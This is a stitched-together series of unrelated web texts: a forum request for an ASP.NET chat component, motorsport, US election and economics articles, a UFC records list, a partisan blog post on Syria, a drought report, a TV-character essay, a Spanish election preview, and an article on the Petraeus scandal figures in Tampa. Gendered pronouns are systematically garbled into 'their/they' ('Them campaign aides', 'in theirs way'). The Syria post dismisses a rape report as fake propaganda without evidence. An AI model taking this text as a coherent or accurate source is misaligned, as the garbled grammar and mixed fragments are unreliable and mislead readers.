Looking for ASP.NET Facebook Style one to one Chat for my social media site Ajax base Hey guys, We have a requirement for a one to one chat from one of our clients for a social media kind of project we are doing. The problem is that we need it in quick time so i would rather use an already made component that is out there. I do not mind paying a license fee but it must not be a yearly thing. One time fee is something that we can convince our project lead for. I have been searching google for the past 4 days and i do not see any components similar to what we need in asp.net. I do see comet chat for php but we need that in asp.net.
below are some of our main requirements:
1-1 chat
Footer placement in bottom right similar to that of facebook and gmail. The ones i can find right now are all chat room sort of layout which we cannot do.
Status to be changes by user. Appear Offline is a must.
SQL Server Database. We need all chat transcripts to be saved until we want to delete/archive them.
Group Chat is a plus as we might need that in future but is not needed right now. But a possibility of having in future would be a good thing.
Any help/suggestions will be highly appreciated.
Hampson joined Coyne's team last winter along with Bourdais, for whom they had been race engineer during the Frenchman's five-year/four championship run at Newman/Haas Racing.
Last month, Hampson helped Motorsport.com document the extreme time pressure the Plainfield, Ill. team had been under since Bourdais was an innocent victim in the first-lap shunt at the Phoenix race.
Since then, the team has had to remove the new engine it acquired in the wake of that shunt and refit the engine it had used in the #18 car at Phoenix as HPD had repaired it – only to see it blow up in the second lap of the Grand Prix of Indianapolis, after Bourdais qualified sixth.
Then Bourdais had the 118G shunt on the first day of qualifying for the Indy 500 and is likely out for the whole season. Their replacement James Davison then suffered a raceday crash, although the team got some reward thanks to Ed Jones' third-place finish. Last Saturday, both cars were eliminated in the eight-car shunt that occurred on Lap 152 at Texas Motor Speedway. Tristan Vautier, Bourdais' latest stand-in, had qualified fifth and led 15 laps and Jones had also joined the lead pack long before the accident occurred.
One team insider says DCR's repair bill since Phoenix, six weeks ago, is around $1.3m. Hampson told Motorsport.com: “I have never been part of such a string of destruction. I feel so bad for Dale and [wife] Gail Coyne. Every dollar of replacement parts has to come out of their pockets. And the poor mechanics have to keep working so hard, so long, fitting the cars back together.
“It is our plan to get two cars to Elkhart Lake [Road America test on Wednesday], but it won't be easy. Ed's #19 wasn't good, but it wasn't terrible after the Texas wreck. But the #18 has both a cracked gearbox and tub damage.
“It's going to be a very late night tonight, and we will try to get the cars into the trucks by later in the day Tuesday. At least Elkhart is in fairly close vicinity.”
Hampson said the last six weeks had also taken a severe toll on Dale Coyne Racing's spare parts supply.
“We are working to revive and repair the tub from the Davison crash at Indy,” they said, “but as a team we only have two transmissions now. Any gearbox failure from here on out will stop us in our tracks, until we can get that inventory addressed.”
Hampson said that the team's run of bad luck felt especially cruel because of DCR's strong step forward in competitiveness in 2017.
“It's such a shame,” they remarked. “We've had really good speed almost every week. You want to see proper reward for the investment by Dale and the effort from the mechanics.”
WASHINGTON — Hillary Clinton hasn't run a TV ad in Colorado since July, but on Monday their campaign said it planned buy to commercials in Denver, Colorado Springs and Grand Junction for the final week of the campaign.
Asked about the timing, their Colorado staff said the new ads were not in response to the latest controversy over Clinton's e-mails. Rather, they said the intent is to help candidates such as Morgan Carroll and Gail Schwartz, two Colorado Democrats looking to unseat Republican U.S. Reps. Mike Coffman and Scott Tipton, respectively.
“We have a robust lead in ballots returned, but Colorado Democrats have competitive races to win across the state. And Hillary Clinton is committed to electing progressives up and down the ballot to make a real difference for families in Colorado,” said Emmy Ruiz, Clinton's Colorado director, in a statement.
Them campaign aides did not disclose the size of the buy, other than to say it would cost six figures and include two ads — both of which attack the temperament of Donald Trump, the Republican presidential nominee.
Most recent polls have shown Clinton ahead in Colorado; one average of the latest polls had Clinton with a lead of 5 percentage points. As of Monday morning, Democrats had returned more ballots than Republicans, according to state figures.
But Trump has made a last-minute push to capture Colorado, campaigning in the state during the weekend.
“It is obvious that the Clinton campaign is running scared. The good people of Colorado like what they see and hear from Donald Trump and reject the 30 years of failed policies and constant scandals Hillary Clinton has given them. America will be great again when Donald Trump is president,” said Patrick Davis, a Trump senior adviser.
It must be a condition of employment that a journalist who writes about the current recession include in their article the statement, consumption makes up more than two-thirds of the economy or consumption spending accounts for 70 percent of GDP. This seemingly simple, factual statement, however, is nearly always intended to carry some explanatory weight, and on occasion the writer spells out this explanation by adding a statement such as, unless consumers begin to open their wallets and spend more, recovery from the current recession will be impossible.
At first glance, this journalistic commonplace appears to make sense. Anyone can understand that, say, a store at the mall will not hire additional employees unless its sales increase enough to justify the additional expense. Hence, would-be employees will remain unemployed; they will purchase fewer consumption goods than they would have purchased if they had jobs; and therefore the stores will not hire more workers; and so forth. The circle of a theory of income and employment seems to be closed, and thus an explanation provided for the lingering recession: consumers are not spending enough.
Depression, War, and C... Robert Higgs Best Price: $4.00 Buy New $6.00 (as of 06:05 EST - Details)
One does not need a Ph.D. in economics, however, to discover that something must be wrong with this way of thinking about prosperity and recession. Checking the national economic accounts produced by the Commerce Department's Bureau of Economic Analysis (Table l.l.6), one finds, for example, that the most recent quarterly peak in real personal consumption expenditure occurred in the fourth quarter of 2007. This spending ($9,244 billion at an annual rate) equaled 69.2 percent of contemporary GDP ($13,364 billion at an annual rate) — where the data are expressed in dollars of 2005 purchasing power. Real GDP did not fall significantly until the third quarter of 2008. When it reached its trough in the second quarter of 2009, it had fallen to $12,810 billion, down about 4 percent. At that time, real personal consumption spending was $9,117 billion, down only 1.4 percent, and equal to about 71 percent of GDP. Thus, as usual over the course of a boom and bust, consumption spending varied proportionately less than GDP as a whole.
As every student of the business cycle learns early on, the most variable part of aggregate expenditure is private investment. When real gross private domestic investment peaked, in the first quarter of 2006, it was $2,265 billion, or 17.5 percent of GDP. When it hit bottom in the second quarter of 2009, it had fallen by 36 percent to $1,453 billion, or 11.3 percent of GDP. (Deducting investment expenditures aimed at compensating for depreciation of the private capital stock [Table 1.7.6], we find that real net private investment — the part that contributes to economic growth — in the most recent quarter was only one-third as great as it was at its peak in early 2006.) The ups and downs of the business cycle are obviously driven not by consumption spending, but by investment spending.
In the second quarter of 2010, real personal consumption was $9,270 billion, or slightly above its previous peak, at an all-time high. If stimulating consumption spending were the key to an economic revival, we would have achieved one already. And if we accepted real GDP as an adequate index of the economy's health, we might affirm that conclusion, given that in the most recent quarter, real GDP was only 1.3 percent below its previous peak. With the official unemployment rate stuck near 10 percent and millions of people having left the labor force or having settled for part-time work, however, that conclusion is hard to swallow.
Read the rest of the article
The Best of Robert Higgs
Current champions Edit
Men's championship history Edit
Women's championship history Edit
Superfight Championship (defunct) Edit
Tournament winners Edit
The Ultimate Fighter Edit
Champions by nationality Edit
Division champions are the primary separation criteria due to being non-closed competition. It includes titleholders and interim titleholders. Interim champions who become undisputed champions are listed only once. People with multiple title reigns will have each of them counted. Tournament wins are secondary due to many tournaments being country specific and thus not generally a national achievement to win. Runners-up and The Ultimate Fighter runners-up are not included. Country Division
champions Tournament
champions TUF
Winners Total 68 16 31 115 15 5 8 28 4 - 3 7 2 - - 2 2 - - 2 1 - 3 4 1 - 1 2 1 1 - 2 1 - - 1 1 - - 1 1 - - 1 - - 5 5 - - 2 2 - 2 - 2 - - 1 1 - - 1 1 - - 1 1 - - 1 1 - - 1 1
Most wins in title bouts Edit
Most consecutive title defenses Edit
Longest reigning champions Edit
Multi-division champions Edit
See also Edit
July 12, 2012
Syria: How U.S. Pays SNC, Auxiliaries Pull Back, Fake Rape
Is the Syrian National Council of expats that demands war against Syria a western political intelligence operation?
Sure. And if there ever were any doubts about that this piece should bury them.
This is a story about the storytellers: the spokespeople, the "experts on Syria", the "democracy activists". The statement makers. The people who "urge" and "warn" and "call for action". It's a tale about some of the most quoted members of the Syrian opposition and their connection to the Anglo-American opposition creation business.
...
As we will see, several of these spokespeople have found support, and in some cases developed long and lucrative relationships with advocates of military intervention on both sides of the Atlantic.
...
The piece goes into the well sourced details of years-long western finance for several of the leading SNC functionaries including for one of their main promoters the neocon Michael Weiss who we flagged here half a year ago.
Remember that Turkish jet Syria shot down? Erdoğan and their sidekicks were so up in arms about that they ran to their NATO daddies to ask for help. They claimed that the jet was shot down outside of Syrian airspace. NATO help was denied because, as I interpreted it, NATO was sure that the jet was shot down within Syrian airspace while it tested the Syrian air defense.
Erdoğan is under fire from the Turkish opposition and is now heavily backtracking on their original claim:
There are growing numbers of question marks surrounding last month's downed Turkish plane as the prime minister admitted yesterday that all details from the incident were not yet known as Washington said it knew everything about the downing but was refusing to share the information with the media. The sense of confusion was enhanced by an Air Force general who said the plane, which was downed June 22, might have been hit by a personally operated missile from a Syrian ship rather than a surface-to-air missile. At the same time, the military also altered the way it is having been describing the event, referring to the plane as the jet that “Syria claimed to have shot down” rather than the jet that “Syria shot down.”
It seems that Erdoğan and their military will soon claim that the jet went down for "technical reasons" or because of a "pilot error".
That news comes as the Washington Post claims that arms deliveries to Syrian rebels are delayed:
Activists give differing interpretations of what they say are shipments of weapons that are not making it across the usual route — the Turkish-Syrian border. One leading opposition member attributed the blockage to Turkish anxiety in the wake of Syria's downing of a Turkish jet last month.
Or anxiety about Russia doubling its troops in Armenia near the Turkish border ?
The Lebanese government is reinforcing its troops on the Syrian border to prevent smuggling and cross border fighting.
Jordan is also tightening its border with Syria as it fears infiltration of loyal Syrian troops.
All these steps by Turkey, Lebanon and Jordan may be to just starve off various freelance groups and Salafis fighting in Syria and to channel the guns to groups selected by the CIA and its new friends in the Muslim Brotherhood.
But another interpretation is that they finally found sense and recognized that further fighting in Syria will inevitably deliver serious blowbacks to their countries. They recognize that the U.S. project for regime change in Syria has for now failed and are winding down their part of it.
As I currently read it the second interpretation is a bit more likely one. This does not mean that Washington has stopped the war mongering. But its auxiliaries seem to leave the field or at least have second thoughts.
To instigate war one needs propaganda and here is a very typical piece of such: The Ultimate Assault: Charting Syria's Use of Rape to Terrorize Its People. The piece is simply fake news based on very dubious third hand tales and propagated by one of the U.S. government sponsored fake humanitarian endeavors. In the comments thereto Don Bacon points out that the piece was commissioned by Joe Lieberman, the neocon Senator for Israel.
That fact as well as the trails in the first linked piece tells us where this whole operation against Syria was thought up and is coming from.
Posted by b on July 12, 2012 at 01:44 PM | Permalink
Comments
The second-worst category of drought has spread to include a large swath of southern Arkansas, the National Weather Service said Thursday.
The latest U.S. Drought Monitor, which reflects conditions through Tuesday, shows about 14 percent of the state under extreme drought. The area comprises all or part of the southern-most row of counties as well as Bradley, Drew, Lincoln, Cleveland and Desha counties.
Only about 5 percent of the state was under an extreme drought last week.
John Robinson, warning coordination meteorologist for the weather service in North Little Rock, said the increase was "no surprise" given a lack of rain, but some relief is likely on the way.
Thunderstorms are possible over most of Arkansas Thursday night through Friday night.
"The moisture content of the atmosphere is greater than normal for this time of year, suggesting that there will be some locally heavy downpours," Robinson said in an email. "What we do not want to see, however, is all the rain come down at once. When the ground is dry and hard as it is now, especially in southern Arkansas, too much rain all at once leads to too much runoff and not enough rain soaking into the ground."
None of Arkansas is under the worst category of drought, exceptional. Nearly 30 percent is under at least a severe drought and nearly 40 percent is under at least a moderate drought.
A year ago, conditions were far worse with extreme drought covering about 42 percent of the state.
Sex Is Power: Frank Underwood, Hollywood's First Bi President
Frank Underwood is not a good guy. Their ruthlessness might be admirable if they weren't a manipulative politician who has clawed their way to the top using any means necessary, decade after decade. You could probably name a number of offenses he's committed as president that were grounds for impeachment (or at least losing the Democratic primary). He's got blood on their hands, both human and dog. Sadly, he's the politician many of us expect to be lurking in the Capitol, making sneaky, destructive back-room deals — and if he's in your party, you're happy to have him, as long as their evil deeds fly completely under the radar.
But while House of Cards' Frank Underwoood is among the most watchable flawed characters on television, there's also something quite interesting about him; their sexuality. Perhaps you caught that episode in season 2 where they and Claire Underwood hooked their sensuous claws into Secret Service agent Edward Meechum. Or the one where Underwood reconnects with an old flame from their military academy days. Or the episode in season 3 where things get intimate with biographer Thomas Yates (after multiple episodes pulsating with sexual tension between the writer and the president). So what's the deal with the people Frank Underwood gets in bed with — and I'm not talking about their political wheeling and dealing.
Hollywood loves to be progressive with its presidents. Before the real world, pretend voters have repeatedly elected a person of color or a woman in films and television: Cherry Jones as President Allison Taylor and Dennis Haysbert as President David Palmer on 24, Geena Davis as President Mackenzie Allen on Commander in Chief, Morgan Freeman as President Tom Beck in Deep Impact. It may have been inadvertent, but House of Cards finally took the next step when its writers made Kevin Spacey's Francis J. Underwood America's first bisexual president.
Perhaps Underwood wouldn't frame themselves as such. But based on their history, they are.
When asked whether they consciously portray their main character as bisexual, the show's creator Beau Willimon tells The Advocate, "I think it's an interesting thesis. … But I think I'd prefer to let the audience experience Frank as they see fit rather than try to define who they are for them."
Well, as an audience member, and a bisexual person, I knew there was something up as soon as I saw that spark between Frank and their old military academy buddy, Tim Corbet. It was evident the second they locked eyes again after years apart. But in that moment, Underwood drops their defenses. They stop being South Carolina Rep. Frank Underwood, a conservative Democrat, and is just Frank, perhaps for the first time in the show's first season. They get flushed. He's vulnerable and doe-eyed. Yes, this evil man is capable of having feelings toward another human; and yes, that human happens to be a man.
But not just one man. They drop their guard again with Yates, as their tension in season 3 remained palpable until that one moment in Underwood's study.
Underwood is generally impenetrable, even to the viewer as they let us come along for the ride — except for when it comes to their intimacy with other men. Even with the way they trust Meechum and their dirty right-hand henchman Doug Stamper, Underwood code-switches in the company of men. But not all men. Only certain men. The right men.
Even though they continue a deep relationship and professional partnership with their wife (as they say, "I love that woman. I love them more than sharks love blood"), and carried on an affair with the late reporter Zoe Barnes, the dude ain't straight. Nor is they gay. But in all the speculation around Underwood's sexuality, bisexuality is rarely even considered a possibility, which says a lot about the perceptions of bisexuality to most people in the first place: one or the other, with no variation, no fluidity, and only one choice to label oneself.
Denis Dison of the Gay and Lesbian Victory Fund, an organization that helps LGBT politicians win office, says they wish Frank were forthright about their sexuality, if they are indeed a bisexual politician.
"We would rather have a bisexual politician presented in a better light — someone who was open about it, honest about it, and also not a murderer," Dison says with a laugh. But hey, "some murderers are bisexual. Some are gay. It's something we have to get used to. But clearly the vast majority of murderers are straight, just like the vast majority of people."
Any casual watcher of House of Cards (including those who dropped the show beyond the pilot thanks to its dark nature) knows Underwood is not a good human. Would LGBT people — particularly bisexual people — really be OK with claiming Underwood as one of our own?
He's an incredible fictional character but not exactly a great role model, with all that scheming, lying, and killing. After all, when any minority group is portrayed terribly on television or in movies, it stings a little extra. It's not like television has a great track record of positively reflecting the totality of its viewership, which is partly why shows like Empire, Jane the Virgin, Broad City, and Scandal have such fierce followings. Compared to the general television landscape, these shows are radical simply because the characters central to the story look like the audience. Even if you hate-watch these shows, you're tuning in to keep them on television, because what else is there?
Historically, evil bisexuals in television and films are just tired tropes: Bisexuals can't be trusted — so naturally, they're murderers.
These days the number of bisexual female characters on the small screen isn't too bad. There are a few on top-rated network, cable, and streaming series. Taylor Schilling's Piper Chapman, the central character on Netflix's other flagship show, Orange Is The New Black, seems to be bisexual too. But male characters? Not so much. One could say Frank Underwood is just another portrayal of a bisexual villain. Except in House of Cards, he's the central character. We watch them and their wife intensely. Perhaps Frank is being written as sexually fluid simply to add some depth to them or, as Dison says, "to make them exotic." That's very possible.
And in somewhat of a refreshing turn, Frank isn't "struggling" with their sexuality. They know who they are, they don't care whether you like it or not, and they don't necessarily need to put a label on it. But to both Frank and Claire, sex isn't sex. Sex is power — Frank has said so himself: "Everything is about sex. Except sex. Sex is about power." And power seems to be their endgame, because what the hell else would all of this scheming and sacrifice be for, anyway? So is this even about Underwood's sexual identity? Do they even have a sexual "identity"?
This season, Underwood is faced with an international LGBT rights crisis ripped from the headlines as Russia's president oppresses its queer citizens. And when he's pressed to talk about their administration's stance on gay rights, they give a typical conservative Democrat's answer, even if they sounded a little flustered giving it: Gay people have rights in this country, and their voices shouldn't be suppressed, as they now are in Russia.
As Nathan Darrow, who plays Meechum, toldrecently, "The show traffics in ambiguity on so many levels — the ambiguity of our moral life, our sexual life, our life in relation to power."
But what if Underwood wasn't ambiguous? What if Underwood comes out or gets outed? There's always that threat. As Dison says, people are increasingly open to the idea of having a gay president. A Pew Research Center poll from last April shows that 66 percent of voters wouldn't determine their support of a candidate based on their or their sexual orientation (for what it's worth, 5 percent said they would be more likely to support a gay or lesbian candidate). That number is an increase of 15 percentage points in seven years. So why not a bisexual president?
"Well, now that Frank Underwood has broken that ceiling, anything is possible," Dison jokes. "But really, I think [American voters] are [ready]. If there's a politician who has proven themselves in state politics, or in Congress who has a national profile, then the possibility is there to seek higher office. We are beginning to see LGBT people step into that pre-presidential level. There's a member of Congress, there's a governor. There won't be too many years before we see people mentioned."
Lynnette MFadzen, bisexual activist and cohost of The BiCast, is especially knowledgeable about Oregon's brand-new bisexual governor, Kate Brown. While Brown is bisexual and assumed office after an ethics scandal brought down the top official in the state, that's where the similarities between Underwood and Brown end. Brown's sexuality, MFadzen says, is hardly an issue to Oregonians anymore.
"She came right out in the beginning of their political career," they say. "She doesn't talk about it, of course, because what politician does? It was very impactful to the point where now it's not really a big deal."
As Dison says, America will be ready for an openly gay president when the time comes, and Oregon has had no qualms with Brown as governor — they were considered a potential candidate to replace John Kitzhaber after their term limit was up in 2018 anyway. But is America ready for a real-life bisexual president?
"Here's how I really feel about it," MFadzen says. "I don't think bisexuality really carries [more or less stigma, politically]. In the heterosexual world, it's all the same thing. I don't think they really see it as any different. If you're talking about the LGBT community, I see that it is an issue, coming out as openly bisexual."
Perhaps in season 4, Frank will come out. Or be outed. Or voted out of office. Or assassinated. But no matter what happens, Underwood will wield their power, whether it's with physical, emotional, or sexual clout, and he'll get what they want, no matter who or what stands in theirs way.
1. Aguirre vs. Carmena
Esperanza Aguirre consiguió que Mariano Rajoy la aceptara como candidata para Madrid a pesar de ser su mayor dolor de cabeza para sus tensiones internas en el partido. Y la aceptó porque podía ganar. Aguirre se las prometía felices porque era complicado que su rival directo en el PSOE, Antonio Miguel Carmona, lanzado desde hace muchos meses como candidato, pudiera dar un sprint final que recortara la histórica diferencia entre PP y PSOE en la capital. Y porque Podemos, tan boyante durante meses, no tenía un perfil en Madrid que pudiera amenazarla.
Entonces apareció Manuela Carmena. En menos de lo que dura una campaña electoral 'milagrosa' ha conseguido llevar a Ahora Madrid desde los 5 escaños hasta casi el empate técnico con el PP según el CIS. Ha sido después cuando Carmena ha eclosionado mediáticamente, convertida en una mezcla de Obama y José Mujica, en parte también gracias a los ataques de Aguirre. Las encuestas publicadas y también las que maneja el PP y que no publican confirman que los populares podrían perder el Ayuntamiento de Madrid despues de 25 años.
2. Ada Colau vs. Trias
Ada Colau y Xavier Trias
Ada Colau lleva predicando su conquista de Barcelona desde hace ahora justo un año. Por el camino ha ido aglutinando apoyos fundamentales para ser una contrincante con posibilidades frente al alcalde Xavier Trias (CiU): tanto ICV, Podemos, EUiA, Procés o Equo han dado su apoyo a los guanyem, que inauguraron la filosofía de confluencia que han intentado importar con diferente éxito en otras ciudades. Hay muchas miradas en Barcelona para definir los límites de lo posible.
Xavier Trias tiene que demostrar que CiU sigue representando la centralidad no solo soberanista, además de revalidar su gestión como alcalde durante uno de los procesos más espinosos para los herederos políticos de Jordi Pujol.
3. Cifuentes vs. Gabilondo
Cristina Cifuentes y Ángel Gabilondo
Pedro Sánchez se juega mucho con el resultado de la Comunidad de Madrid. No solo por la importancia de la institución en sí sino porque el candidato, Ángel Gabilondo, llegó a la cabeza de lista después de que el secretario general defenestrara bruscamente a Tomás Gómez. Dicen las encuestas que, electoralmente, las expectativas del PSM han mejorado.
Ángel Gabilondo se enfrenta a Cristina Cifuentes con todas las de perder y hasta tiene en el retrovisor a José Manuel López, de Podemos, que a última hora puede beneficiarse del efecto Carmena a pesar de que la exjueza no nombre a Podemos en sus intervenciones. Pero Gabilondo ha hecho una campaña a su estilo, ofreciendo un perfil de persona de consenso, reflexiva, independiente. Los escépticos dicen que no tiene punch, carisma, cualidades para dar un buen mitin; sus fieles dicen que precisamente por todo eso es bueno para un PSOE que necesita cambiar de códigos.
Aquí lo relevante es otro detalle: al contrario de lo que pasa en otras comunidades o ayuntamientos importantes, un posible pacto entre Gabilondo y José Manuel López no suena estrambótico ni para PSOE ni para Podemos si tiene como finalidad evitar que Cifuentes gobierne. Sin embargo, la clave será Ciudadanos: una alianza de Albert Rivera con Esperanza Aguirre sería muy criticada, pero quizá no lo fuera tanto con Cifuentes.
La cifra clave: la mayoría absoluta está en 55.
4. Cospedal vs. Page
Castilla La Mancha estrena nueva ley electoral, muy criticada por quienes la ven como un claro intento del PP de rentabilizar mejor sus resultados electorales en un momento débil. Aún así, la secretaria general del PP a nivel nacional puede perder el Gobierno en Castilla La Mancha. El socialista García Page cuenta con algo parecido a un empate para abrir el juego de los pactos. Cospedal ya ha dicho que perder su comunidad no significaría abanadonar su cargo en la dirección del partido. Los escaños que obtenga Ciudadanos serán clave para alcanzar los 17 de la mayoría absoluta.
5. Monago vs. Fernández Vara
Nadie tendrá mayoría absoluta en Extremadura. El PP de José Antonio Monago tiene pinta de desplomarse y, aunque el PSOE puede bajar en votos, el CIS dice que ganará las elecciones y podrá gobernar con permiso de Podemos o Ciudadanos. Guillermo Fernández Vara se quedó hace cuatro años con la miel en los labios por la abstención de IU, que hoy lucha por las décimas que eviten su desaparición del parlamento.
La mayoría absoluta está en 33 escaños.
6. Zoido vs. Espadas
Juan Ignacio Zoido y Juan Espadas
En Sevilla, Juan Ignacio Zoido (PP) y Juan Espadas (PSOE) luchan por la alcaldía a bastante distancia de las nuevas candidaturas. Pero también dependerán de pactos. Zoido mira a los cuatro concejales que el CIS le da a Ciudadanos con incertidumbre: puede necesitar que tengan alguno más para sumar con ellos la mayoría absoluta, pero también es consciente de que sus caladeros de votos son vasos comunicantes. Si ellos suben, él baja. Espadas se presenta por segunda vez y su incertidumbre no es menor: no sabe qué hará Ciudadanos y no sabe exactamente con quién tendría que buscar pactos a su izquierda porque al estallar por los aires el proceso de confluencia de Ganemos Sevilla no está claro qué más grupos entrarán en el Ayuntamiento (IU, Participa Sevilla, Equo...). Zoido ha dicho que dejará gobernar a Espadas si éste consigue la lista más votada, quizá en un intento de forzar que Espadas prometiera lo mismo - no ha sucedido - y así proteger su previsible victoria en votos.
La mayoría absoluta está en 16.
7. La batalla del Ebro
La proyección de Pablo Echenique en Podemos le ha convertido en el candidato más mediático al Gobierno de Aragón. No es, sin embargo, el candidato favorito en las encuestas. Tanto PP como PSOE cuentan con tener más escaños que Podemos. De hecho, a pesar de perder mucho apoyo, el PP puede mantener el gobierno dependiendo de los resultados de Ciudadanos y PAR.
En Zaragoza habrá cambio de alcalde, básicamente porque Juan Antonio Belloch (PSOE) no se vuelve a presentar. Lo que está mucho menos claro es quién le sucederá. El PP ganó en votos en 2011 y una combinación de PSOE, CHA e IU impidió su gobierno. El histórico segundo de Belloch, Carlos Pérez, tiene ahora su oportunidad, pero la irrupción de Zaragoza en Común está siendo tan apabullante en esta ciudad como en Barcelona, lo que deja en el aire quién será la primera y la segunda lista más votada. Y aunque ganara el PP, hay varias combinaciones de pactos que podrían evitar de nuevo su gobierno.
8. El puzle de Vitoria
¿Os acordáis de aquel alcalde que dijo aquello de que los inmigrantes vienen a vivir de las ayudas sociales y que luego insistió? Pues el CIS dice que gana las elecciones y de calle. Será en Vitoria, donde ha hecho una campaña intentando no utilizar más que en lo imprescindible las siglas del PP. Para arrebatar la alcaldía al PP, no solo hace falta que Bildu y PNV se pongan de acuerdo sino también el PSE, que cae, o nuevas formaciones como Irabazi -la unión de Ezker Anitza y Equo- y Hemen Gaude, avalada por Podemos.
La mayoría absoluta está en 14.
9. Mucho más que Navarra
El paisaje político en Navarra tiene dos invitados nuevos que van a recomponerlo to-do. Podemos rasca votos entre otros a Bildu y Ciudadanos rasca también, sobre to-do a UPN, que gobierna ahora. Resultado: las encuestas dicen que Podemos puede ganar desde cero las elecciones en Navarra, cosa que abre un proceso postelectoral de lo más interesante, con pactos a varias bandas, por ejemplo con Bildu o PSN, lo que traería consecuencias en el discurso político estatal. La presión "desde Madrid" está asegurada.
10. Rita en vilo
Juego abierto en Valencia. Rita Barberá reza para que a pesar de su previsible pérdida de votos pueda sumar y convencer a Ciudadanos para formar gobierno. Pero ojo porque la suma de PSPV, València en Comú y Compromís también está al borde de ser suficiente para un pacto, según las encuestas realizadas incluso antes de algunos escándalos que han afectado a Barberá durante la campaña. Este es uno de esos lugares donde candidaturas avaladas por Podemos tendrán que decidir si dejan gobernar al PP o si pactan con el PSOE para darle la alcaldía. No será una decisión fácil desde el punto de vista interno, tampoco en Valencia.
Hay más, mucho más. ¿Bajará tanto el PP en Santiago de Compostela para que el PSG pueda pactar con Compostela Aberta y BNG? ¿Conseguirá Ciudadanos hacer el daño suficiente a Teófila Martínez para que ésta pierda su sempiterna mayoría absoluta en Cádiz y abrir el juego a un posible pacto alrededor del Por Cádiz Sí se Puede? ¿Se le complicará el pacto con Ciudadanos al PP de Fabra en la comunidad valenciana? ¿Y qué pasará con la Marea Atlántica de A Coruña? ¿Y con el PSOE en Canarias?
Y así más de 8.000 preguntas que se contestarán, casi todas, esta noche.
TAMPA — In late September, a U.S. Marine Corps four-star general and the head of the Central Intelligence Agency sent letters to a court in Washington, D.C., testifying that a single mom in Tampa named Natalie Khawam was fit to parent their 4-year-old son.
Gen. John R. Allen praised Khawam — the twin sister of Jill Kelley, the woman who sparked an FBI investigation that exposed retired Gen. David Petraeus' affair — for their "maturity, integrity and steadfast commitment to raising their child." Petraeus told the court Khawam "dotes on their son and goes to great lengths — and great expense — to spend quality time with him."
The court had a different opinion.
"Ms. Khawam appears to lack any appreciation or respect for the importance of honesty and integrity in their interactions with their family, employers, and others with whom they come in contact," a judge wrote after a litany of hearings and psychological evaluations. "The court fully expects that Ms. Khawam's pattern of misrepresentations about virtually everything, including the most important aspects of their life, will continue indefinitely."
They were more than $3 million in debt, records show. They had blown through four jobs in five years and sued a former employer for sex harassment. They had had three failed engagements, left their new husband and moved in with their sister where they quickly began hobnobbing with military brass and others in Tampa's elite circles.
What moved the top government brass to go to bat for a woman the court said suffers from "severe" psychological deficits? The answer can be found in Jill Kelley's social climb in the last decade, since they and their surgeon husband moved south from Philadelphia and found a niche hosting lavish parties for military brass from MacDill.
South Tampa's decades-long reputation for genteel hospitality toward the military has transformed over the past several days into a soap opera of sexual misconduct and improper emails that has already cost Petraeus their job and threatens Allen's career as well. Ground zero is not the Pentagon, but a mansion on Bayshore Boulevard inhabited by a family with lavish appetites and gigantic debts.
• • •
In the spring of 2003, the Kelleys hosted a dinner party at Tampa's Palm Restaurant to celebrate their decision to make their adopted city a permanent home. Among the select group of Tampa's business, government and military elite were Marine Lt. Gen. Michael "Rifle" DeLong, then second in command to Gen. Tommy Franks at CentCom, former Mayor Dick Greco and their wife, Linda, and retired Tampa Tribune columnist Tom Mc­Ewen.
DeLong's wife, Kathy, recalls meeting Jill Kelley, 37, at a "patriotic function in Tampa."
"They (the twins) could work a room better than any politician," they said. "They're bright, fun, just who you'd want at your party."
The DeLongs began including them at base functions, "and once you're on the list, you're on the list," they said. That friendship extended to Gen. John Abizaid, who ran CentCom from July 2003 to March 2007.
"They really connected because of their shared Lebanese heritage," said DeLong.
Determined to make their footprint, Jill Kelley knocked on doors up and down Bayshore Boulevard, asking homeowners if their house was for sale. They wanted the prestigious address, and they got it. In June 2004, the couple paid $1.5 million for a 4,800-square-foot brick mansion with stately white pillars and a view of Hillsborough Bay, just six miles from MacDill Air Force Base.
Kelley's husband, it seemed, could afford the good life on their salary from Moffitt Cancer Center, where they worked in the department of surgery after a two-year fellowship.
"He was a highly talented guy. Great interpersonal skills,'' said Dr. Richard Karl, the founding medical director at Moffitt, who hired Kelley. "He and their wife were very charming when I knew them back then."
The Kelleys were known for their "extravagant parties; there was always more than you could possibly eat," they said.
Records show the Kelleys created a cancer charity in 2005. According to its 2007 tax return, The Doctor Kelley Cancer Foundation's primary purpose was to "conduct research studies into efforts to discover ways to improve the quality of life of terminally ill adult cancer patients." Natalie Khawam was also named as a director of the nonprofit. But of $157,284 raised in revenue that year, meals and entertainment accounted for more than $43,000 in expenses, legal fees more than $25,000, and automotive expenses more than $8,800. According to state corporate records, the group was dissolved in 2007. But as late as February 2010, Jill Kelley solicited contributions for the group to provide a dinner for the homeless. In an email to prospective donors, they asked for " 'in kind' donations (i.e. more food, drinks, banners, decorations)" and noted that their group was a "tax write-off."
In 2008, Kelley moved to Lakeland to start an esophageal cancer/surgical oncology program at Lakeland Regional Medical Center. They established their practice at the 200-physician Watson Clinic in Lakeland, a well-regarded practice that's one of the biggest in the area.
Soon after Petraeus arrived at MacDill in 2008, the Kelleys invited the general and their wife to a small dinner at which they introduced them to noteworthy Tampa residents, said retired Army Col. Steve Boylan, a former Petraeus aide who is acting as their unofficial spokesperson.
Petraeus and their wife, Holly, became friends with the Kelleys after that. The friendship continued after the Petraeuses moved to Washington, Boylan said. When the Kelleys would go up to visit their family, the families would see each other.
Lawsuits show the Kelleys were treading water by then, when Scott Kelley was making just the minimum payment on a Visa Signature card that had accumulated a balance over $70,000 and was taking on hundreds of dollars in interest each month. According to a lawsuit filed this year, Kelley defaulted on that card in 2010, the same year Regions bank sued them and their wife over a debt in excess of $250,000. Chase sued for more than $25,000 and Regions Bank filed to foreclose on their Bayshore home. The bank said it was owed more than $1.7 million, and that it had not gotten any payments since Sept. 2009.
They defaulted on more credit cards and the lawsuits stacked up, but they continued to host parties and held tight to their friendship with Petraeus.
It was a friendship between couples, Boylan said, the kind where the families visited each other at Christmas.
"Based on my conversation with David Petraeus, they were very, very clear, very adamant: It is strictly a close friendship that grew out of their time in Tampa and continued when they moved," Boylan said. "No romantic involvement whatsoever."
Noting that he's not speaking for the military, MacDill or CentCom, Boylan said, "In many towns there are people of note who take an interest in the military community and try to support them in various ways."
• • •
When Natalie Khawam moved to their sister's house in Tampa in March 2009, they brought their own baggage, records show. They had moved south from Washington, D.C., with their infant son without their husband's permission. Grayson Wolfe would spend nearly two years fighting in court before they regained custody of their son. Khawam had changed the boy's name to John and didn't correct them when the boy called Scott Kelley "Dad," court records show.
